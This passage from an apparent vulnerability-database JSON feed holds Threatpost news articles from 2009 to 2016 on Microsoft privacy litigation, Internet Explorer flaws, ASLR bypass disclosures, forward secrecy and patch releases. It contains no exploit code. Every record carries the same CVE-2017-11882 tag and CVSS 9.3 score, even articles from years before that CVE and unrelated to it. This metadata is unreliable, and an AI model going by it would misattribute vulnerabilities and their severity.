failure to provide notice,\u201d said Alex Abdo, staff attorney with the ACLU, in a statement.\n\nMicrosoft\u2019s lawsuit is the latest in a string of high-profile battles with the government over privacy issues. Last week, tech firms and privacy advocates banded together to [voice opposition to a draft bill](<https://threatpost.com/burr-feinstein-anti-crypto-bill-slammed-by-critics/117314/>), the Compliance with Court Orders Act of 2016. Then, of course, there is Apple and its battle with the government\u2019s demands to help it crack its own encryption in order to break into an iPhone.\n\nControversial aspects of ECPA have been debated for years. 
In fact, earlier this week the House Judiciary Committee amended a current ECPA reform bill \u2014 the Email Privacy Act \u2014 by removing a provision that also attempts to fix notice requirement. The timing of Microsoft\u2019s suit is fortuitous, Butler said. \n\n\u201cI think this lawsuit will provide a much needed venue to address the lack of notice for email warrants,\u201d Butler said. \u201cCongress has had the opportunity in the past to address this problem, but has not yet taken the steps necessary to do so. The court should reaffirm that notice is a critical component of government searches under the Fourth Amendment,\u201d he said. \n\nAs for Microsoft\u2019s hope of victory? EFF\u2019s Crocker said Microsoft has a strong case. \u201cGiven the numbers Microsoft lists in the complaint and the statute\u2019s failure to comport with the First Amendment, I think there\u2019s a pretty good likelihood the suit will at the minimum force some changes to the government\u2019s practices or ECPA,\u201d Crocker said. \n\nBecause of the secret nature of such requests, it\u2019s impossible to tell how many secret government information requests businesses receive. One estimate from a 2012 report authored by Texas Southern University\u2019s Thurgood Marshall School of Law called \u201c[Gagged, Sealed & Delivered](<https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2071399>)\u201d (PDF), estimates 30,000 electronic surveillance orders approved by magistrate judges each year. \n\u201cIndividuals have a constitutional right to receive notice when their persons, papers, and effects have been subject to search. The denial of this right is a harm, and prevents realistic engagement by the public on an issue of national importance (privacy),\u201d EPIC\u2019s Butler said. 
\n", "cvss3": {}, "published": "2016-04-15T15:22:02", "type": "threatpost", "title": "Microsoft Wins Widespread Support in Privacy Clash With Govt.", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-15T19:22:02", "id": "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "href": "https://threatpost.com/microsoft-wins-widespread-support-in-privacy-clash-with-government/117458/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "**UPDATE**\u2013As if all of the vulnerabilities in Flash and Windows discovered in the Hacking Team document cache and the 193 bugs Oracle fixed last week weren\u2019t enough for organizations to deal with, HP\u2019s Zero Day Initiative has released four new zero days in Internet Explorer Mobile that can lead to remote code execution on Windows Phones.\n\nThe four vulnerabilities originally were reported to Microsoft as affecting IE on the desktop, and later on it was discovered that they also affected IE Mobile on Windows Phones. Microsoft has patched all of the vulnerabilities in the desktop version of the browser, but the bugs remain open on IE Mobile. ZDI\u2019s original advisories on these flaws said that they were zero days on Internet Explorer, as well. The company updated the advisories late Thursday to reflect the fact that the bugs only affect IE Mobile.\n\n\u201cWe\u2019re aware of the reports regarding Internet Explorer for Windows Phone. A number of factors would need to come into play, and no attacks have been reported. We continue to monitor the situation and will take appropriate steps to protect our customers,\u201d a Microsoft spokesperson said.\n\nEach of the four vulnerabilities is in a different component of the browser, but they all are remotely exploitable. 
The advisories from ZDI say that attackers could exploit these vulnerabilities through typical drive-by attacks.\n\nThe most severe of the four vulnerabilities is a bug in the way that Internet Explorer handles some specific arrays.\n\n\u201cThe vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables. By manipulating a document\u2019s elements an attacker can force Internet Explorer to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory from ZDI](<http://www.zerodayinitiative.com/advisories/ZDI-15-359/>) says.\n\nThat vulnerability was discovered as part of the Mobile Pwn2Own contest in November and ZDI disclosed it to Microsoft at the time. ZDI has a policy of disclosing privately reported vulnerabilities after 120 days, even if the affected vendor has not released a patch. Microsoft has not issued patches for any of the four vulnerabilities disclosed by ZDI this week.\n\nAmong the other vulnerabilities the company disclosed is a flaw in how IE handles some objects.\n\n\u201cThe specific flaw exists within the handling of CAttrArray objects. By manipulating a document\u2019s elements an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-360/>) says. \n\nThe other two vulnerabilities are similar, in that they involve IE mishandling certain objects. IE will in some circumstances mishandle CTreePos and CCurrentStyle objects, leading to a dangling pointer that an attacker can reuse. \n\n_This story was updated on July 23 to add context about the flaws only affecting IE Mobile and the comment from Microsoft._\n\n_Image from Flickr photos of [C_osett](<https://www.flickr.com/photos/mstable/>). 
_\n", "cvss3": {}, "published": "2015-07-23T09:14:36", "type": "threatpost", "title": "Four Zero Days Disclosed in Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-28T14:23:41", "id": "THREATPOST:59C4483705849ADA19D341EFA462DD19", "href": "https://threatpost.com/four-zero-days-disclosed-in-internet-explorer/113911/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:42", "description": "Researchers at HP\u2019s Zero Day Initiative have disclosed full details and proof-of-concept exploit code for a series of bugs they discovered that allow attackers to bypass a key exploit mitigation in Internet Explorer.\n\nThe disclosure is a rarity for ZDI. The company typically does not publish complete details and exploit code for the bugs it reports to vendors until after the vulnerabilities are fixed. But in this case, Microsoft has told the researchers that the company doesn\u2019t plan to fix the vulnerabilities, even though the bugs were serious enough to win ZDI\u2019s team a $125,000 [Blue Hat Bonus](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>) from Microsoft. The reason: Microsoft doesn\u2019t think the vulnerabilities affect enough users.\n\nThe vulnerabilities that the ZDI researchers submitted to Microsoft enable an attacker to fully bypass ASLR (address space layout randomization), one of the many mitigations in IE that help prevent successful exploitation of certain classes of bugs. ZDI reported the bugs to Microsoft last year and disclosed some limited details of them in February. 
The researchers waited to release the full details until Microsoft fixed all of the flaws, but Microsoft later informed them that they didn\u2019t plan to patch the remaining bugs because they didn\u2019t affect 64-bit systems.\n\n\u201cIn this situation, Microsoft\u2019s statement is technically correct \u2013 64-bit versions do benefit from ASLR more than 32-bit versions. A 64-bit system has a much larger address space than a 32-bit system, which makes ASLR that much more effective. However what is lost here is that the bypass described and submitted only works for 32-bit systems, which is the default configuration on millions of systems. To demonstrate this, we have released proof-of-concept (PoC) code to demonstrate this bypass on Windows 7 and Windows 8.1,\u201d a blog [post](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-and-back-again-a-journey-through-bounty-award-and/ba-p/6756465#.VYgirOs2ItZ>) from Dustin Childs of HP says. \n\nChilds, who is a former Microsoft security official, said ZDI is releasing the details and [PoC code](<https://github.com/thezdi/abusing-silent-mitigations>) in order to give users as much information as possible to defend themselves against potential attacks.\n\n\u201cSince Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers), it is in their judgment not worth their resources and the potential regression risk. 
We disagree with that opinion and are releasing the PoC information to the community in the belief that concerned users should be as fully informed as possible in order to take whatever measures they find appropriate for their own installations,\u201d he said.\n\nMicrosoft did not provide a comment in time for publication of this story.\n", "cvss3": {}, "published": "2015-06-22T15:11:28", "type": "threatpost", "title": "HP Releases Details, Exploit Code for Unpatched IE Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-25T21:13:37", "id": "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "href": "https://threatpost.com/hp-releases-details-exploit-code-for-unpatched-ie-flaws/113408/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:53", "description": "Dennis Fisher and Mike Mimoso talk about the [VENOM vulnerability](<https://threatpost.com/venom-flaw-in-virtualization-software-could-lead-to-vm-escapes-data-theft/112772>), the idea of marketing bugs, Microsoft\u2019s new [Edge browser security features](<https://threatpost.com/microsoft-edge-browser-seen-as-a-big-security-upgrade/112738>) and the awesome [CSI: Cyber finale](<https://threatpost.com/the-triumphant-finale-of-csi-cyber/112820>).\n\nDownload: [digital_underground_203.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_203.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2015-05-15T11:34:18", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso on VENOM, Marketing Bugs, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-18T17:26:21", "id": "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "href": "https://threatpost.com/threatpost-news-wrap-may-15-2015/112852/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:53", "description": "Microsoft yesterday added four cryptographic cipher suites to its default priority ordering list in Windows, a move that brings Perfect Forward Secrecy to the operating system.\n\n[Update 3042058](<https://technet.microsoft.com/en-us/library/security/3042058>) is available for now only on the Microsoft Download Center, affording users the opportunity to test the ciphers before bringing them into their respective IT environments. The updates are available for Windows 7, 8 and 8.1 32- and 64-bit systems, as well as Windows Server 2008 R2 and Windows Server 2012 and 2012 R2 systems.\n\n\u201cThe update adds the following cryptographic cipher suites to the default list in all affected operating systems and includes improvements to the cipher suite priority ordering,\u201d Microsoft said. The suites are:\n\n * TLS_DHE_RSA_WITH_AES_256_GCM_SHA384\n * TLS_DHE_RSA_WITH_AES_128_GCM_SHA256\n * TLS_RSA_WITH_AES_256_GCM_SHA384\n * TLS_RSA_WITH_AES_128_GCM_SHA256\n\nBringing Perfect Forward Secrecy to Windows is an important step forward, especially in the context of the expressed desire of many [large technology providers to encrypt everything](<https://threatpost.com/twitter-hardens-services-with-perfect-forward-secrecy/103026>) in the wake of Snowden and NSA/GCHQ surveillance. PFS ensures that new private keys are negotiated for every session, meaning that if a key is ever compromised in the future, only that particular session will be at risk. In order to attack each session, each key would have to be attacked separately.\n\n\u201cPFS is definitely important when considering attackers with virtually unlimited resources to eavesdrop and crack encryption keys,\u201d said Craig Young, a researcher at Tripwire.\n\nWhile experts are generally applauding Microsoft\u2019s foray into PFS, Microsoft is late to the party. 
Google, for example, has had the capability in its products for close to three years. Others, including Dropbox, Facebook, Twitter, and Tumblr, all support PFS and have done so for at least a year. Microsoft, however, last year did bring [PFS to its web-based email service Outlook.com](<https://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965>).\n\nPFS, while a step forward, is not perfect. There is a performance hit, which Microsoft acknowledges in its advisory, because of its higher computing requirements. It urges Windows server administrators to test for jumps in resource consumption as connections encrypted with TLS/SSL scale up on the client and server side. Kenneth White, director of the Open Crypto Audit Project (OCAP), said Microsoft\u2019s use of crypto suites such as DHE rather than ECDHE, for example, could exacerbate the performance issue.\n\n\u201cIt\u2019s an important milestone, but their choices are a little puzzling,\u201d White said. \u201cFirst, the Forward Secrecy suites (DHE) are ephemeral but they don\u2019t use elliptic curves, and are actually one of the least efficient PFS suites. It\u2019s also good to see the rollout of authenticated modes (AEAD, here GCM). So, this is certainly forward progress, but it would be nice to see efficient authenticated ephemeral Diffie-Hellman ECC suites on the near-term road map.\u201d\n\nWhite said the use of DHE rather than ECDHE, in some cases, causes a twofold to eightfold decrease in performance.\n\n\u201cIf the server has to work harder, the maximum number of simultaneous connections is significantly reduced,\u201d White said. \u201cSimilarly, clients such as web browsers or API peers will have higher load using DHE.\u201d\n\nExperts have been harping on the fact that Perfect Forward Secrecy should be considered a minimum crypto standard, especially with new applications. 
The same goes for HSTS, or [HTTP Strict Transport Security](<https://www.owasp.org/index.php/HTTP_Strict_Transport_Security>), which is a security policy header that tells browsers to communicate only over HTTPS.\n\n\u201cManaging your crypto by removing old ciphers and in this case adding new ones is a good housekeeping move for Microsoft,\u201d said Jon Rudolph, principal software engineer at Core Security. \u201cKnowing your cipher suites is like knowing what you\u2019re eating: it\u2019s a fundamental building block of trust, and it pays to read the label.\u201d\n", "cvss3": {}, "published": "2015-05-13T12:14:00", "type": "threatpost", "title": "Microsoft Brings Perfect Forward Secrecy to Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-15T18:33:16", "id": "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "href": "https://threatpost.com/new-crypto-suites-bring-perfect-forward-secrecy-to-windows/112783/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:01", "description": "SAN FRANCISCO\u2013One of the downsides to being a software company with a huge customer base is that your products are going to be prime targets for attackers. But the flip side to that coin is that you\u2019re going to gather a _lot_ of data about vulnerabilities and attacks.\n\nMicrosoft has been collecting that data for years now and has used it to help inform decisions about new defensive technologies, product improvements and patching strategies. The company shared some of that information Tuesday at the RSA Conference here and some of the data they have is quite revealing. One of the most intriguing bits to come out of the numbers is that while there are still large numbers of remote code execution vulnerabilities being disclosed every year, attackers are exploiting fewer and fewer of them.\n\n\u201cVulnerabilities represent potential risk. 
But until somebody goes through the effort to develop an exploit that leverages that vulnerability, the risk isn\u2019t actualized. The percentage of remote code execution vulnerabilities that are actually exploited is declining. The actual risk appears to be going down based on what we see,\u201d said Matt Miller, principal security software engineer in the Microsoft Security Response Center. \u201cThe absolute number of those bugs continues to decline, as well.\u201d\n\nRemote code execution vulnerabilities are attacker catnip, and that\u2019s especially true of RCE bugs in widely deployed software such as browsers and operating systems. For years, attackers had a field day with vulnerabilities in Internet Explorer and Windows, particularly buffer overflows. Rare was the Patch Tuesday that didn\u2019t include fixes for a buffer overflow or six. But Microsoft has put a lot of resources and effort into making those bugs more difficult to exploit, and Miller said the work has paid off.\n\nIn fact, he said the company didn\u2019t see a single stack corruption exploit in 2014.\n\n\u201cA couple of things have driven that. The Security Development Lifecycle has helped us eradicate these classes of bugs. And we\u2019ve driven mitigations and improvements that have helped too,\u201d Miller said. \u201cIn practice, this isn\u2019t a vulnerability class that people go after anymore.\u201d\n\nThose changes have forced the attacker community to shift gears. Miller said attackers have started targeting use-after-free vulnerabilities more often and have moved heavily into return-oriented programming, a technique that can be used to bypass exploit mitigations in software. 
At the same time, the rise of easily available exploit kits such as [Angler](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>), [Blackhole](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/77000>) and others has made it much simpler for attackers to go after new vulnerabilities. And the exploits are showing up in those kits much more quickly than ever before.\n\nDavid Weston, principal program manager on the Microsoft One Protection team, who spoke alongside Miller, said that as recently as the beginning of 2014 it was taking roughly 30 days for exploits for a newly patched vulnerability to show up in the common exploit kits. By the end of the year, it was within ten days of the patch. And now, not only are the kit developers adding exploits for known bugs, but they are in some cases putting in exploits for undisclosed vulnerabilities.\n\n\u201cBy the beginning of this year, we\u2019re seeing the primary exploit kit developers introducing zero days,\u201d Weston said. \u201cThe trickle-down effect is changing, as we\u2019re seeing many more of these crimeware kits source things for themselves. That\u2019s a dramatic change.\u201d\n", "cvss3": {}, "published": "2015-04-21T17:41:22", "type": "threatpost", "title": "Microsoft Data Shows Drop in Remote Code Execution Bugs Being Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T21:41:22", "id": "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "href": "https://threatpost.com/microsoft-data-shows-drop-in-remote-code-execution-bugs-being-exploited/112371/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:10", "description": "Microsoft uncovered more than 1,800 bugs in Office 2010 by tapping into the unused computing horsepower of idling PCs. Office developers found the bugs by running millions of \u201cfuzzing\u201d tests, said Tom Gallagher, senior security test lead with Microsoft\u2019s Trustworthy Computing group. [Read the full article](<http://www.computerworld.com/s/article/9174539/Microsoft_runs_fuzzing_botnet_finds_1_800_Office_bugs>). [Computerworld]\n", "cvss3": {}, "published": "2010-03-31T21:11:20", "type": "threatpost", "title": "MS Discovers Over 1,800 Office 2010 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:06:49", "id": "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "href": "https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/73767/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:24", "description": "Microsoft\u2019s security response team is investigating reports of a potentially dangerous code execution vulnerability in its flagship Internet Explorer browser.\n\nThe company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop-up dialog box.\n\nMicrosoft\u2019s Jerry Bryant said the company is not aware of any attacks related to this vulnerability.\n\n\u201cWe have determined that users running Windows 7, Windows Server 2008 R2, Windows Server 2008, and Windows Vista, are not affected by this issue,\u201d Bryant said.\n\nFrom [the MSRC blog](<http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx>): \n\nThe issue in question involves the use of VBScript and Windows Help files in Internet Explorer. Windows Help files are included in a long list of what we refer to as \u201cunsafe file types\u201d. These are file types that are designed to invoke automatic actions during normal use of the files. While they can be very valuable productivity tools, they can also be used by attackers to try to compromise a system. \n\nAlthough this issue has been publicly documented, Microsoft has not yet provided pre-patch mitigation guidance or workarounds for affected customers.\n", "cvss3": {}, "published": "2010-03-01T14:26:26", "type": "threatpost", "title": "Microsoft Warns of New IE Code Execution Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:22:38", "id": "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "href": "https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/73602/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:46", "description": "Jonathan Ness of Microsoft\u2019s Security Research and Defense team explains the inner workings of the Data Execution Prevention technology that can help mitigate the [targeted attacks exploiting the vulnerability in Internet Explorer](<https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/>) right now. [Read the full post](<http://go.microsoft.com/fwlink/?LinkID=124807>).\n", "cvss3": {}, "published": "2010-01-19T14:32:51", "type": "threatpost", "title": "How DEP Can Mitigate IE Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:06", "id": "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "href": "https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/73391/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:03", "description": "Microsoft dismissed recently disclosed threats to its BitLocker disk-encryption technology as \u201crelatively low risk,\u201d noting that attackers must not only have physical access to a targeted PC, but must manipulate the machine two separate times. [Read the full article](<http://www.computerworld.com/s/article/9141959/Microsoft_downplays_Windows_BitLocker_attack_threat>). [Computerworld] \n", "cvss3": {}, "published": "2009-12-08T20:24:42", "type": "threatpost", "title": "MS Says Bitlocker Threat Pretty Low", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:57:07", "id": "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "href": "https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/73227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. 
Microsoft also said that running IE7 on Windows Vista in Protected Mode, which limits some of the browser\u2019s functionality, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting, and enabling DEP (Data Execution Prevention) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "cvss3": {}, "published": "2009-11-24T14:39:50", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:04:18", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:15", "description": "WASHINGTON\u2013Microsoft has spent several years and untold millions of dollars working on methods to write more secure and reliable software, and now the company is encouraging other organizations to make the same investment in software security.\n\nOne of the outputs of the company\u2019s software security efforts is its much-heralded Security Development Lifecycle (SDL), a framework for developing methods for writing secure code. However, as Microsoft has acknowledged and other experts have pointed out, the SDL was developed specifically for Microsoft\u2019s own internal processes and is not a one-size-fits-all methodology. But companies that are interested in using the lessons that Microsoft has learned throughout the process can use the SDL as a starting point for their own efforts, Jim Molini, a senior program manager at Microsoft, said in a talk at the OWASP AppSec DC conference here Thursday.\n\n\u201cIf you build software, you have to focus on how you build it, because it\u2019s becoming a higher priority attack vector right now,\u201d he said. 
\u201cThey\u2019re finding new ways to attack us and we have to find ways to buttress our software against these attacks.\u201d\n\nMolini said that a software security program has to be a comprehensive effort that includes everyone involved in the development process and must start with a fundamental change in the way that software is written. \n\n\u201cYou have to eliminate the separation of security in the development organization,\u201d he said. \u201cIt\u2019s really going to take people working together to fix this.\u201d\n\nMolini also emphasized that just having a whole bunch of other developers or testers look at the code is not enough.\n\n\u201cMany eyeballs don\u2019t solve the security problem. It\u2019s more than just being able to write code,\u201d Molini said. \u201cIt\u2019s fixing the process aspects and the software development processes in order to reduce the number of vulnerabilities you introduce. You can\u2019t just say zero-defect code is secure. You have to prioritize security as a development goal.\u201d\n\nSoftware security experts often say that when they show developers ways that their applications can be broken or abused, the developers protest that no user would ever do the things that broke the application. Users may not, but attackers most certainly will. To help eliminate this mentality, Molini said developers need to think like attackers and not users.\n\n\u201cYou need to develop abuse cases, not just use cases, so that the test team can develop tests for them,\u201d he said. 
\u201cThat will make your software much more secure in the long run.\u201d\n", "cvss3": {}, "published": "2009-11-12T19:08:15", "type": "threatpost", "title": "Microsoft Pushes for Better Software Security Practices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:11:49", "id": "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "href": "https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/73089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:22", "description": "After releasing its largest-ever group of security patches two weeks ago, Microsoft has done a little cleaning up.\n\nOver the past few days, the company has re-released two security updates and issued a workaround for a Windows CryptoAPI patch that caused Microsoft\u2019s own instant-messaging server to crash. 
[Read the full story](<http://www.computerworld.com/s/article/9140139/Microsoft_cleans_up_bugs_after_biggest_patch_release?source=rss_security>) [IDG News Service/Robert McMillan]\n", "cvss3": {}, "published": "2009-10-30T13:53:35", "type": "threatpost", "title": "Microsoft Cleans Up Bugs After Biggest Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:19:07", "id": "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "href": "https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/72929/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:35", "description": "Less than a week after [a malicious advertising attack against the New York Times](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>) ad servers, Microsoft filed five civil lawsuits against companies allegedly using online advertising to serve malware.\n\nThe lawsuits allege that individuals using the business names \u201cSoft Solutions,\u201d \u201cDirect Ad,\u201d \u201cqiweroqw.com,\u201d \u201cITmeter INC.\u201d and \u201cote2008.info\u201d used malvertisements to distribute malicious software or present deceptive websites that peddled scareware to unsuspecting Internet users.\n\n\u201cAlthough we don\u2019t yet know the names of the specific individuals behind these acts, we are filing these cases to help uncover the people responsible and prevent them from continuing their exploits, [said Tim Cranton](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>), associate general counsel at Microsoft.\n\nOur filings in King County Superior Court in Seattle outline how we believe the defendants operated, but in general, malvertising works by camouflaging malicious code as harmless online advertisements. These ads then lead to harmful or deceptive content. 
For example, ads may redirect users to a website that advertises rogue security software, also known as scareware, that falsely claims to detect or prevent threats on the computer. Malvertising may also directly infect a victim\u2019s computer with malicious software like Trojans \u2013 programs that can damage data, steal personal information or even bring the users\u2019 computer under the control of a remote operator.\n\nHere are the copies of Microsoft\u2019s court filings:\n\n * Microsoft Corp. and Microsoft Online Inc. v. John Does 1-20, d/b/a DirectAd Solutions: King Co. Superior Court Cause [No. 09-2-34024-2 SEA](<http://microsoftontheissues.com/cs/files/folders/32725/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a Soft Solutions, Inc. King Co. Superior Court Cause [No. 09-2-34021-8 SEA](<http://microsoftontheissues.com/cs/files/folders/32719/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a qiweroqw.com: King Co. Superior Court Cause [No. 09-2-34020-0 SEA](<http://microsoftontheissues.com/cs/files/folders/32722/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ote2008.info: King Co. Superior Court Cause [No. 09-2-34022-6 SEA](<http://microsoftontheissues.com/cs/files/folders/32720/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ITmeter Inc. : King Co. Superior Court Cause [No. 
09-2-34023-4 SEA](<http://microsoftontheissues.com/cs/files/folders/32724/download.aspx>)\n", "cvss3": {}, "published": "2009-09-23T22:40:03", "type": "threatpost", "title": "Microsoft Takes Aim at Malvertising Threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:50", "id": "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "href": "https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/72218/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Microsoft\u2019s September batch of security updates will include fixes for a multiple \u201ccritical\u201d vulnerabilities affecting the Windows operating system.[](<https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/>)\n\nIn all, the software maker [will release five bulletins](<http://www.microsoft.com/technet/security/bulletin/ms09-sep.mspx>) with patches for a range of flaws that could expose users to remote code execution attacks.\n\nThe flaws affected all supported versions of Windows, including Windows Vista and Windows Server 2008.\n\nMicrosoft describes a \u201ccritical\u201d vulnerability as one whose exploitation could allow the propagation of an Internet worm without user action so it\u2019s important that Windows users treat next Tuesday\u2019s updates with the highest priority.\n\nIt is not yet clear if this month\u2019s patches will cover the FTP in IIS vulnerability that was disclosed with exploit code earlier this week.\n", "cvss3": {}, "published": "2009-09-08T11:59:04", "type": "threatpost", "title": "Five Critical Bulletins Coming on MS Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:49", "id": "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "href": "https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/72234/", "cvss": 
